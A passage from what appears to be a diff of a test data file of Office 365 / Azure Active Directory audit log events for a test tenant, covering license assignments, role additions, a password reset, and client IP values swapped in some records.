\"46129a58-a698-46f0-aa5b-17f6586297d9\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"5470e086-1d30-40a3-8a36-dc894c02853b\",\r\n \"ServiceInstance\": \"exchange\/eurp189-004-01\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": 
\"2021-02-04T16:00:04.795755Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"6db1f1db-2b46-403f-be40-e39395f08dbb\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"e5e1357f-5c22-422c-806d-7275487fa160\",\r\n \"ServiceInstance\": \"exchange\/eurp189-004-01\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.795755Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"6dc145d6-95dd-4191-b9c3-185575ee6f6b\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"72193fee-3205-4d91-93cc-aaad05f4b51a\",\r\n \"ServiceInstance\": \"exchange\/eurp189-004-01\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.795755Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"41fcdd7d-4733-4863-9cf4-c65b83ce2df4\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"5590ce99-6d49-4579-9ac0-015666391f30\",\r\n \"ServiceInstance\": \"exchange\/eurp189-004-01\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.795755Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"bf6f5520-59e3-4f82-974b-7dbbc4fd27c7\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"3589364b-02d2-47ce-8ec2-65fac6da2105\",\r\n \"ServiceInstance\": \"exchange\/eurp189-004-01\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.795755Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"2f442157-a11c-46b9-ae5b-6e39ff4e5849\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"ac7ced6b-6192-4d6b-877f-fe839dc89629\",\r\n \"ServiceInstance\": \"YammerEnterprise\/EU003\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.795755Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"7547a3fe-08ee-4ccb-b430-5077c5041653\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"0c1bd26f-4bc9-422b-86c7-6ea8c82e19a7\",\r\n \"ServiceInstance\": 
\"WhiteboardServices\/NA001\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.795755Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"4a51bca5-1eff-43f5-878c-177680f191af\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"a69b124f-d570-4930-85ab-eec779f341fc\",\r\n \"ServiceInstance\": \"To-Do\/NA001\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.795755Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"3fb82609-8c27-4f7b-bd51-30634711ee67\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"34128fde-b81c-4ba4-b52d-1f90e290534a\",\r\n \"ServiceInstance\": \"Sway\/NA001\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.795755Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"a23b959c-7ce8-4e57-9140-b90eb88a9e97\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"63d92750-9074-408c-9d54-2b5dabac6aa6\",\r\n \"ServiceInstance\": \"MicrosoftCommunicationsOnline\/EMEA-ED4-A10\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.795755Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"0feaeb32-d00e-4d66-bd5a-43b5b83db82c\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"39a7e4a4-f4c1-41f8-bb18-7f05a6da4d01\",\r\n \"ServiceInstance\": \"SharePoint\/SPOS1334\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.795755Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"5dbe027f-2339-4123-9542-606e4d348a72\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"35019b65-6fbd-42ac-9d05-7cf48acc3228\",\r\n \"ServiceInstance\": \"PowerAppsService\/NA001\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.8007551Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"9c0dab89-a30c-4117-86e7-97bda240acd2\"\r\n },\r\n {\r\n \"SubscribedPlanId\": 
\"70b05548-352e-4826-8b18-745862ead768\",\r\n \"ServiceInstance\": \"PowerBI\/EU001\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.8007551Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"70d33638-9c74-4d01-bfd3-562de28bd4ba\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"cd04207c-1a40-4955-bcc2-6a613eb6b070\",\r\n \"ServiceInstance\": \"MicrosoftCommunicationsOnline\/EMEA-ED4-A10\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.8007551Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"4828c8ec-dc2e-4779-b502-87ac9ce28ab7\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"e0d17e2d-3cf3-4e7b-9511-ca1ef458d93a\",\r\n \"ServiceInstance\": \"SharePoint\/SPOS1334\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.8007551Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"e95bec33-7c88-4a70-8e19-b10bd9d0c014\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"3d76f7e5-a895-46fc-9fff-4d8e88fafccc\",\r\n \"ServiceInstance\": \"MicrosoftOffice\/NorthAmerica4\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.8007551Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"43de0ff5-c92c-492b-9116-175376d08c38\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"2dca0324-b5d4-4eef-a9b3-e8a9a1799601\",\r\n \"ServiceInstance\": \"exchange\/eurp189-004-01\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.8007551Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"b1188c4c-1b36-4018-b48b-ee07604f6feb\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"ec74d74f-c601-46f7-8c71-d48d45ca6f10\",\r\n \"ServiceInstance\": \"exchange\/eurp189-004-01\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.8007551Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": 
\"8e0c0a52-6a6c-4d40-8370-dd62790dcd70\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"f37d0e1a-431a-40fe-843c-eaa8680e92aa\",\r\n \"ServiceInstance\": \"Adallom\/Prod04\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.8007551Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"8c098270-9dd4-4350-9b30-ba4703f3b36b\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"3a32eb5b-3007-485e-8fdd-2693dd94d6b7\",\r\n \"ServiceInstance\": \"exchange\/eurp189-004-01\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.8007551Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"4de31727-a228-4ec3-a5bf-8e45b5ca48cc\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"8291070e-0dd9-4003-92fe-f86887ffe7c4\",\r\n \"ServiceInstance\": \"TeamspaceAPI\/NA001\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.8007551Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"57ff2da0-773e-42df-b2af-ffb7a2317929\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"b7e59709-bdcd-4784-af66-76f33b8a30f0\",\r\n \"ServiceInstance\": \"MicrosoftStream\/NA001\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.8007551Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"6c6042f5-6f01-4d67-b8c1-eb99d36eed3e\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"a397c979-112e-4fe1-a202-ee1043382510\",\r\n \"ServiceInstance\": \"Deskless\/NA001\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.8007551Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"8c7d2df8-86f0-4902-b2ed-a0458298f3b3\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"fce1a298-057e-4c3f-8921-49d47f898d53\",\r\n \"ServiceInstance\": \"ProjectWorkManagement\/PROD_EU_Org_Ring_155\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.8007551Z\",\r\n 
\"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"b737dad2-2f6c-4c65-90e3-ca563267e8b9\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"ce1e2a56-ff4e-4307-bf18-4d949f5413f8\",\r\n \"ServiceInstance\": \"exchange\/eurp189-004-01\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.8007551Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"34c0d7a0-a70f-4668-9238-47f9fc208882\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"41c1e3a1-68e7-4a79-aad6-2b138065842f\",\r\n \"ServiceInstance\": \"SCO\/PROD_AMSUB0601_03\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.8007551Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"c1ec4a95-1f05-45b3-a911-aa3fa01094f5\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"8474f4ab-55d9-4d35-bee0-7fd2a36bbe22\",\r\n \"ServiceInstance\": \"OfficeForms\/NA001\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.8007551Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"e212cbc7-0961-4c40-9825-01117710dcb1\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"ddb68c34-8603-4f67-89a2-b3a7ccd802a4\",\r\n \"ServiceInstance\": \"Adallom\/Prod04\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.8007551Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"2e2ddb96-6af9-4b1d-a3f0-d6ecfd22edb2\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"b56bb4d7-b53b-4c00-926c-e4bce0baf3e0\",\r\n \"ServiceInstance\": \"MultiFactorService\/NA001\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.8007551Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"8a256a2b-b617-496d-b51b-e76466e88db0\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"70163138-2060-4c53-83f1-863279967909\",\r\n \"ServiceInstance\": \"RMSOnline\/EU\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": 
\"2021-02-04T16:00:04.8007551Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"bea4c11e-220a-4e6d-8eb8-8ea15d019f90\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"ee9031e1-dcf2-4fbe-ae4a-c1b4a2a8d5a6\",\r\n \"ServiceInstance\": \"exchange\/eurp189-004-01\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.8007551Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"5136a095-5cf0-4aff-bec3-e84448b38ea5\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"a4efbea6-6482-4d5b-a772-6be1d48c10a0\",\r\n \"ServiceInstance\": \"exchange\/eurp189-004-01\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.8007551Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"efb0351d-3b08-4503-993d-383af8de41e3\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"d79ce029-d957-49f1-b7b3-bde340ec6327\",\r\n \"ServiceInstance\": \"ProcessSimple\/NA001\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.8007551Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"07699545-9485-468e-95b6-2fca3738be01\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"2ce2197c-fba9-4aff-85ab-cb4f2ac7010f\",\r\n \"ServiceInstance\": \"exchange\/eurp189-004-01\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.8007551Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"efb87545-963c-4e0d-99df-69c6916d9eb0\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"2e74bf19-8072-42c1-b197-7aab0ee2280c\",\r\n \"ServiceInstance\": \"exchange\/eurp189-004-01\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.8007551Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"9f431833-0334-42de-a7dc-70aa40db46db\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"6508f27b-8794-485b-8db3-4689620ff973\",\r\n \"ServiceInstance\": \"RMSOnline\/EU\",\r\n 
\"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.8057536Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"5689bec4-755d-4753-8b61-40975025187c\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"5faa8b43-3945-4977-a113-b09e5bb12eeb\",\r\n \"ServiceInstance\": \"RMSOnline\/EU\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.8057536Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"6c57d4b6-3b23-47a5-9bc9-69f17b4947b3\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"61052816-0a02-4a30-86d6-280f0aac7651\",\r\n \"ServiceInstance\": \"AzureAdvancedThreatAnalytics\/NA001\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.8057536Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"14ab5db5-e6c4-4b20-b4bc-13e36fd2227f\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"686dc0ed-3e04-466d-9776-1b3fe571d8f8\",\r\n \"ServiceInstance\": \"AADPremiumService\/NA001\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.8057536Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"eec0eb4f-6444-4f95-aba0-50c24d67f998\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"7ae0b18b-03ae-4e23-88d0-9816c5772825\",\r\n \"ServiceInstance\": \"AADPremiumService\/NA001\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.8057536Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"41781fb2-bc02-4b7c-bd55-b576c07bb09d\"\r\n }\r\n]","OldValue":"[]"},{"Name":"PasswordPolicies","NewValue":"[\r\n \"None\"\r\n]","OldValue":"[]"},{"Name":"ProxyAddresses","NewValue":"[\r\n \"SMTP:eve@testsiem4.onmicrosoft.com\"\r\n]","OldValue":"[]"},{"Name":"StsRefreshTokensValidFrom","NewValue":"[\r\n \"2021-02-04T16:00:04Z\"\r\n]","OldValue":"[]"},{"Name":"UserPrincipalName","NewValue":"[\r\n 
\"eve@testsiem4.onmicrosoft.com\"\r\n]","OldValue":"[]"},{"Name":"UserType","NewValue":"[\r\n \"Member\"\r\n]","OldValue":"[]"},{"Name":"Included Updated Properties","NewValue":"AccountEnabled, AssignedLicense, AssignedPlan, PasswordPolicies, ProxyAddresses, StsRefreshTokensValidFrom, UserPrincipalName, UserType","OldValue":""}],"Actor":[{"ID":"root@testsiem4.onmicrosoft.com","Type":5},{"ID":"1003200112EB07E6","Type":3},{"ID":"User_21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"User","Type":2}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"","InterSystemsId":"fce62f3b-f563-49f4-8331-a16989900c83","IntraSystemId":"8c72b235-d3dc-475b-b0d6-8065ac53326a","SupportTicketId":"","Target":[{"ID":"User_43399311-1c28-4cce-a8bc-7e6e791473f2","Type":2},{"ID":"43399311-1c28-4cce-a8bc-7e6e791473f2","Type":2},{"ID":"User","Type":2},{"ID":"eve@testsiem4.onmicrosoft.com","Type":5},{"ID":"1003200113AE1D62","Type":3}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e"} {"CreationTime":"2021-02-04T16:00:19","Id":"8de563f4-6388-4526-9447-422181f8dd55","Operation":"Update user.","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":8,"ResultStatus":"Success","UserKey":"1003200112EB07E6@testsiem4.onmicrosoft.com","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"","ObjectId":"root@testsiem4.onmicrosoft.com","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"additionalDetails","Value":"{\"UserType\":\"Member\"}"},{"Name":"extendedAuditEventCategory","Value":"User"}],"ModifiedProperties":[{"Name":"Included Updated 
Properties","NewValue":"","OldValue":""},{"Name":"TargetId.UserType","NewValue":"Member","OldValue":""}],"Actor":[{"ID":"root@testsiem4.onmicrosoft.com","Type":5},{"ID":"1003200112EB07E6","Type":3},{"ID":"User_21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"User","Type":2}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"","InterSystemsId":"b0e2b807-3c81-465b-988f-04fd297ad069","IntraSystemId":"56714e13-0a0c-4689-97fa-3fb60ca2c384","SupportTicketId":"","Target":[{"ID":"User_21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"User","Type":2},{"ID":"root@testsiem4.onmicrosoft.com","Type":5},{"ID":"1003200112EB07E6","Type":3}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e"} -{"CreationTime":"2021-02-04T16:31:54","Id":"a969d068-cac3-4ba2-a894-0ec9de403d28","Operation":"Add member to role.","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":8,"ResultStatus":"Success","UserKey":"1003200112EB07E6@testsiem4.onmicrosoft.com","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"20.190.129.100","ObjectId":"newuser@testsiem4.onmicrosoft.com","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"additionalDetails","Value":"{}"},{"Name":"extendedAuditEventCategory","Value":"Role"}],"ModifiedProperties":[{"Name":"Role.ObjectID","NewValue":"cc5cbfa4-d24e-4060-9a46-4c8d447b0adf","OldValue":""},{"Name":"Role.DisplayName","NewValue":"Global Reader","OldValue":""},{"Name":"Role.TemplateId","NewValue":"f2ef992c-3afb-46b9-b7cf-a126ee74c451","OldValue":""},{"Name":"Role.WellKnownObjectName","NewValue":"GlobalReaders","OldValue":""}],"Actor":[{"ID":"root@testsiem4.onmicrosoft.com","Type":5},{"ID":"1003200112EB07E6","Type":3},{"ID":"Microsoft Office 365 
Portal","Type":1},{"ID":"00000006-0000-0ff1-ce00-000000000000","Type":2},{"ID":"User_21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"User","Type":2}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"20.190.129.100","InterSystemsId":"84317188-8bc0-48b2-be29-4d7d013d87cc","IntraSystemId":"60feb7be-1cc1-410a-b9b5-d419e4882844","SupportTicketId":"","Target":[{"ID":"User_6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"User","Type":2},{"ID":"newuser@testsiem4.onmicrosoft.com","Type":5},{"ID":"10032001131B9761","Type":3}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e"} +{"CreationTime":"2021-02-04T16:31:54","Id":"a969d068-cac3-4ba2-a894-0ec9de403d28","Operation":"Add member to role.","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":8,"ResultStatus":"Success","UserKey":"1003200112EB07E6@testsiem4.onmicrosoft.com","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"81.2.69.145","ObjectId":"newuser@testsiem4.onmicrosoft.com","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"additionalDetails","Value":"{}"},{"Name":"extendedAuditEventCategory","Value":"Role"}],"ModifiedProperties":[{"Name":"Role.ObjectID","NewValue":"cc5cbfa4-d24e-4060-9a46-4c8d447b0adf","OldValue":""},{"Name":"Role.DisplayName","NewValue":"Global Reader","OldValue":""},{"Name":"Role.TemplateId","NewValue":"f2ef992c-3afb-46b9-b7cf-a126ee74c451","OldValue":""},{"Name":"Role.WellKnownObjectName","NewValue":"GlobalReaders","OldValue":""}],"Actor":[{"ID":"root@testsiem4.onmicrosoft.com","Type":5},{"ID":"1003200112EB07E6","Type":3},{"ID":"Microsoft Office 365 
Portal","Type":1},{"ID":"00000006-0000-0ff1-ce00-000000000000","Type":2},{"ID":"User_21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"User","Type":2}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"81.2.69.145","InterSystemsId":"84317188-8bc0-48b2-be29-4d7d013d87cc","IntraSystemId":"60feb7be-1cc1-410a-b9b5-d419e4882844","SupportTicketId":"","Target":[{"ID":"User_6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"User","Type":2},{"ID":"newuser@testsiem4.onmicrosoft.com","Type":5},{"ID":"10032001131B9761","Type":3}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e"} {"CreationTime":"2021-02-04T16:32:42","Id":"8577f8df-4d23-44a2-b07c-3e09c5252f89","Operation":"Update StsRefreshTokenValidFrom Timestamp.","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":8,"ResultStatus":"Success","UserKey":"1003200112EB07E6@testsiem4.onmicrosoft.com","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"","ObjectId":"newuser@testsiem4.onmicrosoft.com","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"additionalDetails","Value":"{}"},{"Name":"extendedAuditEventCategory","Value":"User"}],"ModifiedProperties":[],"Actor":[{"ID":"root@testsiem4.onmicrosoft.com","Type":5},{"ID":"1003200112EB07E6","Type":3},{"ID":"User_21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"User","Type":2}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"","InterSystemsId":"124fda77-abec-48b1-953a-7d3b1c6fdbda","IntraSystemId":"7ac51b77-568d-4c36-a7c2-dc8d964e446e","SupportTicketId":"","Target":[{"ID":"User_6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"User","Type":2},{"ID":"newuser@testsiem4.onmicrosoft.com","Type":5},{"ID":"
10032001131B9761","Type":3}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e"} {"CreationTime":"2021-02-04T16:32:42","Id":"f94fd47b-4dde-41e5-acc8-9d75946e499e","Operation":"Reset user password.","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":8,"ResultStatus":"Success","UserKey":"1003200112EB07E6@testsiem4.onmicrosoft.com","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"","ObjectId":"newuser@testsiem4.onmicrosoft.com","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"additionalDetails","Value":"{}"},{"Name":"extendedAuditEventCategory","Value":"User"}],"ModifiedProperties":[],"Actor":[{"ID":"root@testsiem4.onmicrosoft.com","Type":5},{"ID":"1003200112EB07E6","Type":3},{"ID":"User_21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"User","Type":2}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"","InterSystemsId":"124fda77-abec-48b1-953a-7d3b1c6fdbda","IntraSystemId":"7ac51b77-568d-4c36-a7c2-dc8d964e446e","SupportTicketId":"","Target":[{"ID":"User_6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"User","Type":2},{"ID":"newuser@testsiem4.onmicrosoft.com","Type":5},{"ID":"10032001131B9761","Type":3}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e"} -{"CreationTime":"2021-02-04T16:31:54","Id":"82693d84-baef-46a1-8b47-6a203ce7c75f","Operation":"Add member to 
role.","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":8,"ResultStatus":"Success","UserKey":"1003200112EB07E6@testsiem4.onmicrosoft.com","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"20.190.129.100","ObjectId":"newuser@testsiem4.onmicrosoft.com","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"additionalDetails","Value":"{}"},{"Name":"extendedAuditEventCategory","Value":"Role"}],"ModifiedProperties":[{"Name":"Role.ObjectID","NewValue":"79bcbf54-dbd5-4fcc-8bf2-ab789e9a97da","OldValue":""},{"Name":"Role.DisplayName","NewValue":"Helpdesk Administrator","OldValue":""},{"Name":"Role.TemplateId","NewValue":"729827e3-9c14-49f7-bb1b-9608f156bbb8","OldValue":""},{"Name":"Role.WellKnownObjectName","NewValue":"HelpdeskAdmins","OldValue":""}],"Actor":[{"ID":"root@testsiem4.onmicrosoft.com","Type":5},{"ID":"1003200112EB07E6","Type":3},{"ID":"Microsoft Office 365 